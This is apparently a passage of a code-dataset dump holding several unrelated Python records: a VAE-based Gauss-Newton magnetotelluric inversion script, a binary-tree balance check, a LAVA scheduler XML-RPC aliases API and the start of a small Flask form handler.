v_true\r\n # v1=tf.constant(v_true)\r\n test_pred_y = decoder(v1)\r\n test_pred_y = K.eval(test_pred_y)\r\n rho_test_no1_p = np.reshape(test_pred_y, [64, 128], order='F')\r\n # h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1, 'mt', [1, 2], 0,\r\n # 1, dir_name+'/no', str(rho_test_no)+'.png', rangex=[-2.1,12.9], rangez=[-2,0])\r\n # h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1_p, 'mt', [1, 2], 0,\r\n # 1, dir_name+'/no', str(rho_test_no)+'_p.png', rangex=[-2.1,12.9], rangez=[-2,0])\r\n\r\n sig_power = np.average(v_true**2)\r\n noi_power = 1 * sig_power\r\n noise = np.random.normal(0, np.sqrt(noi_power), latent_dim)\r\n # for ii in range(10):\r\n # Ka = 0.1*ii+0.1\r\n # noise1 = Ka*noise\r\n # v1=v_true+noise1\r\n # test_pred_y = decoder(v1)\r\n # test_pred_y = K.eval(test_pred_y)\r\n # rho_test_no1_rand = np.reshape(test_pred_y, [64, 128], order='F')\r\n # h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1_rand, 'mt', [1, 2], 0,\r\n # 1, dir_name+'/no', str(rho_test_no)+'_{:.1f}.png'.format(Ka), rangex=[-2.1,12.9], rangez=[-2,0])\r\n\r\n rho_test_no5 = int(jj)\r\n rho_test_no5 = rho_test[rho_test_no5:rho_test_no5 + 1, :, :, :]\r\n v_true5 = meanModel(rho_test_no5) # input can be tensor or numpy, output is numpy\r\n rho_test_no6 = int(jj+1)\r\n rho_test_no6 = rho_test[rho_test_no6:rho_test_no6 + 1, :, :, :]\r\n v_true6 
= meanModel(rho_test_no6) # input can be tensor or numpy, output is numpy\r\n        h_je.Plot2DImage(fieldXEnd - fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no5, 'mt', [bar_1, bar_2],\r\n                         0,\r\n                         1, dir_name + '/no', str(jj) + '.png', rangex=[-2.1, 12.9], rangez=[-2, 0])\r\n        h_je.Plot2DImage(fieldXEnd - fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no6, 'mt', [bar_1, bar_2],\r\n                         0,\r\n                         1, dir_name + '/no', str(jj+1) + '.png', rangex=[-2.1, 12.9], rangez=[-2, 0])\r\n        for kk in range(11):\r\n            v_5_6 = kk * 0.1 * v_true6 + (10 - kk) * 0.1 * v_true5\r\n            test_pred_y = decoder(v_5_6)\r\n            test_pred_y = K.eval(test_pred_y)\r\n            rho_test_no1_rand = np.reshape(test_pred_y, [64, 128], order='F')\r\n            h_je.Plot2DImage(fieldXEnd - fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1_rand, 'mt',\r\n                             [bar_1, bar_2], 0,\r\n                             1, dir_name + '/no', str(jj) + '.{:d}.png'.format(kk), rangex=[-2.1, 12.9],\r\n                             rangez=[-2, 0])\r\n\r\n        raise SystemExit  # deliberate stop after the latent-interpolation previews\r\n\r\n# %%\r\nprint('Inversion with Gauss-Newton')\r\nif not os.path.exists('./inversion_results/'+UID):\r\n    os.makedirs('./inversion_results/'+UID)\r\n    print('./inversion_results/'+UID+' did not exist; created it.')\r\n\r\n[vG, hG] = h_je.computeGradient(interpXLocations, interpDepths, XNumberMT1, ZNumberMT1)\r\n\r\n# DT = np.loadtxt(\"../myHTEM_20220707_for_1D_VAE/model20220809_clean.modt\")\r\n# DT = np.loadtxt(\"../myHTEM_20220707_for_1D_VAE/model20220811b_clean.modt\")\r\nDT = loadmat(\"Model-A.mat\")['model']  # scipy.io's loadmat (np has no loadmat); the 'model' key is an assumption, mirroring the savemat calls below\r\n# DT = np.loadtxt(\"../myHTEM_20220707_for_1D_VAE/model_2D_B.modt\")\r\n\r\nData_set = np.reshape(DT, (ZNumberMT1, XNumberMT1), order='c')\r\n# Data_set[Data_set==10]=100\r\nData_set_log = np.log10(Data_set)\r\n# beta = np.linalg.norm(vG*np.reshape(Data_set_log, -1, order='f'))**2\r\n\r\nv_true_array = np.zeros((1, latent_dim*XNumberMT1))\r\nfor jj in range(XNumberMT1):\r\n    true_rho = Data_set_log[:, jj]\r\n    v_true = meanModel(true_rho.reshape([1,ZNumberMT1,1],order='F'))\r\n    v_true = tf.constant(v_true)\r\n    v_true = K.eval(v_true)\r\n    v_true2 = meanModel2(true_rho.reshape([1, ZNumberMT1, 1], order='F'))\r\n    v_true2 = tf.constant(v_true2)\r\n    v_true2 = K.eval(v_true2)\r\n    if (jj <= 23 and jj >= 14):\r\n        v_true_array[:, jj * latent_dim:(jj + 1) * latent_dim] = v_true2\r\n    else:\r\n        v_true_array[:,jj*latent_dim:(jj+1)*latent_dim] = v_true\r\n\r\nxs = np.linspace(0,XNumberMT1,XNumberMT1+1,dtype='uint8')\r\nzs = np.linspace(0,latent_dim,latent_dim+1,dtype='uint8')\r\n[xss, zss] = np.meshgrid(xs, zs)\r\n\r\nfig = plt.figure(figsize=(5,5))\r\nax1 = fig.add_subplot(1,1,1)\r\nplt.pcolor(xss, zss, np.reshape(v_true_array, (latent_dim, XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n# plt.xlim(-1, plot_x-1)\r\n# plt.ylim(-1, plot_y-1)\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(v_true_array), np.max(v_true_array))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/code_true.png')\r\nplt.close()\r\n\r\nfrequencyMT = np.logspace(fre1, fre2, freqNumberMT) # 0 Corresponds to 5000m\r\n# frequencyMT = np.logspace(1, 4, freqNumberMT)\r\n# rxIndexMT = np.array(np.linspace(10, 118, 16),dtype='uint32') # 1-128 total\r\nrxIndexMT = np.array(np.linspace(5, 45, 16),dtype='uint32') # 1-128 total\r\nrxNumberMT = len(rxIndexMT)\r\nRxMT = [0, 10000]\r\n\r\n[ia_temp, ja, value, Ub, Area, index1, Z] = MT.MT2SparseEquationSetUp_zhhy(interpXLocations, interpDepths)\r\n\r\nMT2DFWD2_packet = {'freq':frequencyMT,'Field_rho':Data_set_log,'Rx':RxMT,'Field_grid_x':interpXLocations,\r\n                   'Field_grid_z':interpDepths, 
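                   # This packet bundles one forward solve's inputs for MT.MT2DFWD2_zhhy:
                   # 'freq' is the MT frequency list, 'Field_rho' the log10-resistivity
                   # section, 'Rx'/'Rx_index' the receiver layout, and the remaining keys
                   # the interpolation-grid geometry; the exact semantics live in the MT
                   # module, which is not shown here.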
'X_number':XNumberMT1,'Z_number':ZNumberMT1,'Rx_index':rxIndexMT}\r\n\r\nif SELECT_AS_INVERSIONMODE:\r\n pool = multiprocessing.Pool(8)\r\n # pool = ProcessingPool(8)\r\n# MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2, MT2DFWD2_packet), range(len(frequencyMT)))\r\ntmstp4a = time.time()\r\n# print(\"before optimization MTFWD time = {} s\".format(tmstp4a-timestamp4))\r\nMT2DFWD2_packet['ia_temp'] = ia_temp\r\nMT2DFWD2_packet['ja'] = ja\r\nMT2DFWD2_packet['value'] = value\r\nMT2DFWD2_packet['Ub'] = Ub\r\nMT2DFWD2_packet['Area'] = Area\r\nMT2DFWD2_packet['index1'] = index1\r\nMT2DFWD2_packet['Z'] = Z\r\n\r\n# %%\r\nif SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\nelse:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\nprint('Successfully computed forward problem')\r\nFieldData = np.zeros(len(rxIndexMT)*2*len(frequencyMT))\r\nfor i in range(len(frequencyMT)):\r\n FieldData[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n FieldData[len(rxIndexMT)*len(frequencyMT) + i*len(rxIndexMT):len(rxIndexMT)*len(frequencyMT) + (i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n\r\nobRhoAmpliAct = FieldData[0:int(len(FieldData)/2)]\r\nobRhoPhaseAct = FieldData[int(len(FieldData) / 2):]\r\n\r\n# Add Noise\r\nFieldData_noise = 0.005*FieldData*np.random.normal(size=(np.shape(FieldData)))\r\nFieldData = FieldData + FieldData_noise*Add_noise\r\n\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(1,1,1)\r\n[xss1, zss1] = np.meshgrid(interpXLocations[rxIndexMT], np.log10(frequencyMT))\r\nplt.pcolor(xss1, zss1, np.reshape(FieldData[:rxNumberMT*freqNumberMT], (freqNumberMT,16), order='c'), cmap=plt.get_cmap('jet'))\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(obRhoAmpliAct), np.max(obRhoAmpliAct))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/data_true.png')\r\nplt.close()\r\n\r\nh_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, Data_set_log, 'mt', [bar_1, bar_2], 0,\r\n 1, './inversion_results/'+UID+'/', 'model_true.png', rangex=[0, 10],\r\n rangez=[-1, 0])\r\n\r\nv_array = np.zeros((1, XNumberMT1*latent_dim))\r\n# tensorData = tf.convert_to_tensor(numpyData, dtype=tf.float32)\r\nrho_recon = initial_res * np.ones(ZNumberMT1, dtype=np.float32)\r\nv = meanModel(rho_recon.reshape([1,ZNumberMT1,1],order='F'))\r\nv2 = meanModel2(rho_recon.reshape([1,ZNumberMT1,1],order='F'))\r\nv = tf.constant(v)\r\nv_np = K.eval(v)\r\nv2 = tf.constant(v2)\r\nv_np2 = K.eval(v2)\r\nfor jj in range(XNumberMT1):\r\n if (jj <= 23 and jj >= 14):\r\n v_array[:, jj * latent_dim:(jj + 1) * latent_dim] = v_np2\r\n else:\r\n v_array[:,jj*latent_dim:(jj+1)*latent_dim] = v_np\r\n\r\n# v_start_array = K.eval(v)\r\nplt.ion()\r\nfig = plt.figure(figsize=(5,5))\r\nax1 = fig.add_subplot(1,1,1)\r\nplt.pcolor(xss, zss, np.reshape(v_array, (latent_dim,XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n# plt.xlim(-1, plot_x-1)\r\n# plt.ylim(-1, plot_y-1)\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(v_true_array), np.max(v_true_array))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/code_start.png')\r\nplt.ioff()\r\nplt.close()\r\n\r\nrho_recon_pred_ii = decoder(v) # tensor\r\nrho_recon_pred_ii2 = decoder2(v2) # tensor\r\nrho_recon_pred = np.zeros((ZNumberMT1, XNumberMT1))\r\nfor jj in range(XNumberMT1):\r\n if(jj <= 23 and jj >=14):\r\n 
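        # Columns 14-23 of the section are decoded with the second network
        # (decoder2 / meanModel2); every other column uses the first VAE.
        # The same column split reappears in each per-column loop below.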
rho_recon_pred[:, jj] = np.reshape(rho_recon_pred_ii2, -1)\r\n else:\r\n rho_recon_pred[:, jj] = np.reshape(rho_recon_pred_ii, -1)\r\n# rho_recons_img = np.reshape(rho_recon_pred, [64, 128], order='F')\r\nh_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_recon_pred, 'mt', [bar_1, bar_2], 0,\r\n 1, './inversion_results/'+UID+'/', 'model_start.png', rangex=[0, 10],\r\n rangez=[-1, 0])\r\n\r\nCost = [1]\r\nMT2DFWD2_packet['Field_rho'] = rho_recon_pred\r\nif SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\nelse:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\nnewData = np.zeros(len(rxIndexMT)*2*len(frequencyMT))\r\nEFieldVectorf = np.zeros((XNumberMT1*ZNumberMT1,len(frequencyMT)),dtype='complex')\r\nEobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT), dtype='complex')\r\nHobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT),dtype='complex')\r\nfor i in range(len(frequencyMT)):\r\n newData[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n newData[len(rxIndexMT)*len(frequencyMT) + i*len(rxIndexMT):len(rxIndexMT)*len(frequencyMT) + (i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n EobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Eobs_in']\r\n HobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Hobs_in']\r\n EFieldVectorf[:,i] = MT2DFWD2_back[i]['EFieldVector_in']\r\n\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(1,1,1)\r\n[xss1, zss1] = np.meshgrid(interpXLocations[rxIndexMT], np.log10(frequencyMT))\r\nplt.pcolor(xss1, zss1, np.reshape(newData[0:int(len(newData)/2)], (freqNumberMT,16), order='c'), cmap=plt.get_cmap('jet'))\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(obRhoAmpliAct), np.max(obRhoAmpliAct))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/data_start.png')\r\nplt.close()\r\n\r\nres = FieldData - newData\r\nCk = norm(res) ** 1 / norm(FieldData) ** 1\r\n# Cost.append(Ck1)\r\n# print('Iter # {}, C = {}'.format(1, Ck1))\r\n\r\nlamdavh = 0e-4\r\nv_ref = np.zeros((1, latent_dim*XNumberMT1))\r\nfor jj in range(max_iter):\r\n [jacobianMTRho, jacobianMTPhi] = jacos.ComputeJacobianFunc_z(EobsVector, HobsVector, EFieldVectorf, frequencyMT,\r\n np.reshape(rho_recon_pred,(ZNumberMT1, XNumberMT1),order='f'), RxMT,\r\n interpXLocations, interpDepths, XNumberMT1, ZNumberMT1,\r\n rxIndexMT, ia_temp, ja, value, Area, index1)\r\n J = np.concatenate((jacobianMTRho, jacobianMTPhi), axis=0) # [Ndata, Nmodel]\r\n\r\n lamda = lamda * lambda_decay\r\n\r\n gk = np.zeros(latent_dim*XNumberMT1)\r\n Hk = np.eye(latent_dim*XNumberMT1)*lamda*Ck\r\n JD = np.zeros((XNumberMT1*ZNumberMT1, XNumberMT1*latent_dim))\r\n for pp in range(XNumberMT1):\r\n print(\"Ite = {}, x_no = {}\".format(jj, pp))\r\n J_slice = J[:, pp*ZNumberMT1:(pp+1)*ZNumberMT1] # [Ndata, Nmodel]\r\n v = v_array[:, pp*latent_dim:(pp+1)*latent_dim]\r\n v = tf.convert_to_tensor(v, dtype=tf.float32)\r\n with tf.GradientTape(watch_accessed_variables=False,persistent=True) as g:\r\n g.watch(v)\r\n if (pp <=23 and pp >= 14):\r\n rho_recon_pred_ii = decoder2(v)\r\n else:\r\n rho_recon_pred_ii = decoder(v)\r\n \r\n jacb = tf.squeeze(g.jacobian(rho_recon_pred_ii,v)).numpy()\r\n # jacb = K.eval(tf.squeeze(g.jacobian(rho_recon_pred,v)))\r\n jacb1 = np.reshape(jacb,[ZNumberMT1, latent_dim],order='F') # [Nmodel, 
N_latent_z]\r\n\r\n JD[pp*ZNumberMT1:(pp+1)*ZNumberMT1, pp*latent_dim:(pp+1)*latent_dim] = jacb1\r\n\r\n J2 = np.matmul(J_slice,jacb1)\r\n # JLv = np.matmul(Lv,jacb1)\r\n # JLh = np.matmul(Lh,jacb1)\r\n # lamda = lamda * 0.8\r\n v_ref_ii = v_ref[:, pp*latent_dim:(pp+1)*latent_dim]*Use_ref\r\n Hk[pp*latent_dim:(pp+1)*latent_dim, pp*latent_dim:(pp+1)*latent_dim] = \\\r\n Hk[pp*latent_dim:(pp+1)*latent_dim, pp*latent_dim:(pp+1)*latent_dim] + np.matrix(J2).H.dot(J2)\\\r\n / norm(FieldData) ** 2\r\n gk[pp*latent_dim:(pp+1)*latent_dim] = -np.matrix(J2).H.dot(res) / norm(FieldData) ** 2 + lamda * Ck*(v-v_ref_ii)\r\n # gk = -2 * np.matrix(J2).H.dot(res) / norm(FieldData) ** 2 + lamda * Ck1*v\r\n # Hk = 2 * np.matrix(J2).H.dot(J2) / norm(FieldData) ** 2 + lamda * Ck1 * np.eye(latent_dim)\r\n\r\n rho_recon_pred_array = np.reshape(rho_recon_pred, -1, order='f')\r\n hG_JD = hG*JD\r\n hG_m = hG*rho_recon_pred_array\r\n vG_JD = vG*JD\r\n vG_m = vG*rho_recon_pred_array\r\n gk = gk + beta * Ck*np.dot(np.matrix(hG_JD).H, hG_m) + beta2 * Ck*np.dot(np.matrix(vG_JD).H, vG_m)\r\n Hk = Hk + beta * Ck*np.dot(np.matrix(hG_JD).H, hG_JD) + beta2 * Ck*np.dot(np.matrix(vG_JD).H, vG_JD)\r\n # print(\"To here.\")\r\n time1=time.time()\r\n pk = -np.linalg.solve(Hk, gk.T)\r\n time2=time.time()\r\n print('time:' + str(time2 - time1) + 's')\r\n a = 1\r\n v_array_1 = v_array + a * np.transpose(np.real(pk))\r\n # print(v1)\r\n for hh in range(XNumberMT1):\r\n v1 = tf.convert_to_tensor(v_array_1[:, hh*latent_dim:(hh+1)*latent_dim])\r\n if(hh <= 23 and hh >=14):\r\n rho_recon_pred_ii = decoder2(v1)\r\n else:\r\n rho_recon_pred_ii = decoder(v1)\r\n rho_recon_pred[:, hh] = np.squeeze(rho_recon_pred_ii)\r\n # rho_recon_pred_img = np.reshape(rho_recon_pred,[64, 128],order='F')\r\n MT2DFWD2_packet['Field_rho'] = rho_recon_pred\r\n if SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\n else:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\n newData = np.zeros(len(rxIndexMT)*2*len(frequencyMT))\r\n EFieldVectorf = np.zeros((XNumberMT1*ZNumberMT1,len(frequencyMT)),dtype='complex')\r\n EobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT), dtype='complex')\r\n HobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT),dtype='complex')\r\n for i in range(len(frequencyMT)):\r\n newData[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n newData[len(rxIndexMT)*len(frequencyMT) + i*len(rxIndexMT):len(rxIndexMT)*len(frequencyMT) + (i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n EobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Eobs_in']\r\n HobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Hobs_in']\r\n EFieldVectorf[:,i] = MT2DFWD2_back[i]['EFieldVector_in']\r\n res = FieldData - newData\r\n v_array = v_array_1\r\n Ck = norm(res) ** 1 / norm(FieldData) ** 1\r\n\r\n # 20220720\r\n ####\r\n v_ref = np.zeros((1, latent_dim*XNumberMT1))\r\n for gg in range(XNumberMT1):\r\n v_gg = meanModel(np.reshape(rho_recon_pred[:, gg], (1,ZNumberMT1, 1), order='f'))\r\n v_gg = tf.constant(v_gg)\r\n v_gg = K.eval(v_gg)\r\n v_ref[:, gg*latent_dim:(gg+1)*latent_dim] = v_gg\r\n plt.ion()\r\n fig = plt.figure(figsize=(5, 5))\r\n ax1 = fig.add_subplot(1, 1, 1)\r\n plt.pcolor(xss, zss, np.reshape(v_ref, (latent_dim, XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n # plt.xlim(-1, 
plot_x-1)\r\n    # plt.ylim(-1, plot_y-1)\r\n    cbar = plt.colorbar()\r\n    plt.clim(np.min(v_true_array), np.max(v_true_array))\r\n    plt.tight_layout()\r\n    plt.savefig('./inversion_results/' + UID + '/code_map_ite_{}.png'.format(jj + 1))\r\n    plt.ioff()\r\n    plt.close()\r\n    # 20220720\r\n\r\n    # 20220703: Try an exhaustive-search step length?\r\n    # Line Search######################################################\r\n    ls_num = 1\r\n    while (Ck > Cost[-1] and ls_num < 6):\r\n        # cost_propose = 0.5 * norm(Wd * (d_true - d_propose)')^2+0.5*lambda*norm(Wm*m_propose') ^ 2;\r\n        a1 = -0.5 * a ** 2 * (np.dot(gk,pk))/(Ck-Cost[-1]-a*np.dot(gk,pk))\r\n        if (a1 < 0.01 * a):\r\n            a1 = 0.01 * a\r\n        a = a1\r\n        print('ite={}, line search, a={}'.format(jj, a))\r\n        v1_propose = v_array + a * np.transpose(np.real(pk))\r\n        rho_recon_pred_propose = np.zeros((ZNumberMT1, XNumberMT1))\r\n        for hh in range(XNumberMT1):\r\n            v1 = tf.convert_to_tensor(v1_propose[:, hh * latent_dim:(hh + 1) * latent_dim])\r\n            if(hh <=23 and hh >= 14):\r\n                rho_recon_pred_ii = decoder2(v1)\r\n            else:\r\n                rho_recon_pred_ii = decoder(v1)\r\n            rho_recon_pred_propose[:, hh] = np.squeeze(rho_recon_pred_ii)\r\n        MT2DFWD2_packet['Field_rho'] = rho_recon_pred_propose\r\n        if SELECT_AS_INVERSIONMODE:\r\n            MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\n        else:\r\n            MT2DFWD2_back = []\r\n            for ii in range(len(frequencyMT)):\r\n                bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n                MT2DFWD2_back.append(bci)\r\n        newData_propose = np.zeros(len(rxIndexMT) * 2 * len(frequencyMT))\r\n        EFieldVectorf = np.zeros((XNumberMT1 * ZNumberMT1, len(frequencyMT)), dtype='complex')\r\n        EobsVector = np.zeros(len(rxIndexMT) * len(frequencyMT), dtype='complex')\r\n        HobsVector = np.zeros(len(rxIndexMT) * len(frequencyMT), dtype='complex')\r\n        for i in range(len(frequencyMT)):\r\n            newData_propose[i * len(rxIndexMT):(i + 1) * len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n            newData_propose[\r\n            len(rxIndexMT) * len(frequencyMT) + i * len(rxIndexMT):len(rxIndexMT) * len(frequencyMT) + (i + 1) * len(\r\n                rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n            EobsVector[i * len(rxIndexMT):(i + 1) * len(rxIndexMT)] = MT2DFWD2_back[i]['Eobs_in']\r\n            HobsVector[i * len(rxIndexMT):(i + 1) * len(rxIndexMT)] = MT2DFWD2_back[i]['Hobs_in']\r\n            EFieldVectorf[:, i] = MT2DFWD2_back[i]['EFieldVector_in']\r\n        res = FieldData - newData_propose\r\n        Ck_propose = norm(res) ** 1 / norm(FieldData) ** 1\r\n        ls_num = ls_num + 1\r\n\r\n        if (Ck_propose < Cost[-1] or ls_num == 6):\r\n            newData = newData_propose\r\n            newData_log = np.log10(newData)\r\n            v = v1_propose\r\n            Ck = Ck_propose\r\n            rho_recon_pred = rho_recon_pred_propose\r\n            rho_recon_pred_1D = np.reshape(rho_recon_pred_propose, -1)\r\n            break\r\n\r\n    #########################################\r\n    print('Iter # {}, C = {}'.format(jj + 1, Ck))\r\n    Cost.append(Ck)\r\n    print('Relative data misfit = ')\r\n    print(Cost)\r\n\r\n    fig = plt.figure()\r\n    ax1 = fig.add_subplot(1, 1, 1)\r\n    plt.pcolor(xss1, zss1, np.reshape(newData[0:int(len(newData) / 2)], (freqNumberMT, 16), order='c'),\r\n               cmap=plt.get_cmap('jet'))\r\n    cbar = plt.colorbar()\r\n    plt.clim(np.min(obRhoAmpliAct), np.max(obRhoAmpliAct))\r\n    plt.tight_layout()\r\n    plt.savefig('./inversion_results/' + UID +'/data_ite_{}.png'.format(jj+1))\r\n    plt.close()\r\n\r\n    # v_recons_array = K.eval(v1)\r\n    plt.ion()\r\n    fig = plt.figure(figsize=(5,5))\r\n    ax1 = fig.add_subplot(1,1,1)\r\n    plt.pcolor(xss, zss, np.reshape(np.array(v_array), (latent_dim, 
XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n    # plt.xlim(-1, plot_x-1)\r\n    # plt.ylim(-1, plot_y-1)\r\n    cbar = plt.colorbar()\r\n    plt.clim(np.min(v_true_array), np.max(v_true_array))\r\n    plt.tight_layout()\r\n    plt.savefig('./inversion_results/'+UID+'/code_ite_{}.png'.format(jj+1))\r\n    plt.ioff()\r\n    plt.close()\r\n\r\n    h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_recon_pred, 'mt', [bar_1, bar_2], 0,\r\n                     1, './inversion_results/'+UID+'/', 'model_ite_{}.png'.format(jj+1), rangex=[0, 10],\r\n                     rangez=[-1, 0])\r\n    savemat('./inversion_results/' + UID + '/No.' + str(jj+1) + ' Resistivity Model.mat', {'model': rho_recon_pred})\r\n    if Cost[-1] < Cost_threshold and Cost[-2]-Cost[-1] < Delta_cost_threshold:\r\n        break
def isbalance(node):\n    if node:\n        (leftb, lefthigh) = isbalance(node.left)\n        (rightb, righthigh) = isbalance(node.right)\n        if not leftb or not rightb or abs(lefthigh-righthigh) > 1:\n            return (False,0)\n        else:\n            return (True, max(lefthigh,righthigh)+1 )\n\n    else:\n        return (True,0)\n\n\n\n\n\n\n\n\n\n\ndef main():\n    import binarytree\n    from binarytree import BiTreeNode as Node\n\n    root = Node(1)\n    root.left = Node(2)\n    root.right = Node(3)\n    root.left.left = Node(4)\n    root.left.right = Node(5)\n    root.right.left = Node(6)\n    root.right.right = Node(7)\n\n    print(isbalance(root))\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"15814/algorithm","sub_path":"trees/balancetree.py","file_name":"balancetree.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"73737160514","text":"import xmlrpc.client\nfrom django.db import IntegrityError\nfrom django.forms import ValidationError\n\nfrom linaro_django_xmlrpc.models import ExposedV2API\nfrom lava_scheduler_app.api import check_perm\nfrom lava_scheduler_app.models import Alias, DeviceType\n\n\nclass SchedulerAliasesAPI(ExposedV2API):\n    @check_perm(\"lava_scheduler_app.add_alias\")\n    def add(self, name, device_type_name):\n        \"\"\"\n        Name\n        ----\n        `scheduler.aliases.add` (`name`)\n\n        Description\n        -----------\n        Create a device-type alias\n        Permission: lava_scheduler_app.add_alias\n\n        Arguments\n        ---------\n        `name`: string\n            Name of the alias\n        'device_type_name': string\n            Name of the device type to alias\n\n        Return value\n        ------------\n        None\n        \"\"\"\n        try:\n            dt = DeviceType.objects.get(name=device_type_name)\n            if not self.user.has_perm(DeviceType.VIEW_PERMISSION, dt):\n                raise xmlrpc.client.Fault(\n                    404, \"Device-type '%s' was not found.\" % device_type_name\n                )\n            alias = Alias(name=name, device_type=dt)\n            alias.full_clean()\n            alias.save()\n        except ValidationError as e:\n            raise xmlrpc.client.Fault(404, \"\\n\".join(e.messages))\n        except DeviceType.DoesNotExist as nf:\n            raise xmlrpc.client.Fault(400, \"Bad request. DeviceType does not exist\")\n        except IntegrityError:\n            raise xmlrpc.client.Fault(\n                400, \"Bad request. 
Alias or DeviceType name already exists.\"\n )\n\n @check_perm(\"lava_scheduler_app.delete_alias\")\n def delete(self, name):\n \"\"\"\n Name\n ----\n `scheduler.aliases.delete` (`name`)\n\n Description\n -----------\n Remove a device-type alias\n Permission: lava_scheduler_app.delete_alias\n\n Arguments\n ---------\n `name`: string\n Name of the alias\n\n Return value\n ------------\n None\n \"\"\"\n try:\n Alias.objects.get(name=name).delete()\n except Alias.DoesNotExist:\n raise xmlrpc.client.Fault(404, \"Alias '%s' was not found.\" % name)\n\n def list(self):\n \"\"\"\n Name\n ----\n `scheduler.aliases.list` ()\n\n Description\n -----------\n List available device-type aliases\n\n Arguments\n ---------\n None\n\n Return value\n ------------\n This function returns an XML-RPC array of aliases\n \"\"\"\n ret = []\n for alias in Alias.objects.all().order_by(\"name\"):\n ret.append(alias.name)\n return ret\n\n def show(self, name):\n \"\"\"\n Name\n ----\n `scheduler.aliases.show` (`name`)\n\n Description\n -----------\n Show alias details.\n\n Arguments\n ---------\n `name`: string\n Alias name\n\n Return value\n ------------\n This function returns an XML-RPC dictionary with alias details.\n \"\"\"\n try:\n alias = Alias.objects.get(name=name)\n except Alias.DoesNotExist:\n raise xmlrpc.client.Fault(404, \"Alias '%s' was not found.\" % name)\n\n dt = alias.device_type\n if dt is None or not self.user.has_perm(DeviceType.VIEW_PERMISSION, dt):\n return {\"name\": alias.name, \"device_type\": \"\"}\n\n return {\"name\": alias.name, \"device_type\": alias.device_type.name}\n","repo_name":"Linaro/lite-lava","sub_path":"lava_scheduler_app/api/aliases.py","file_name":"aliases.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1423468891","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n##########################################\n\n@app.route('/', methods=['GET', 'POST'])\ndef fun_1():\n if request.method == 'POST':\n email = request.form['in_1']\n return \"Welcome {}\".format(email)\n \n return 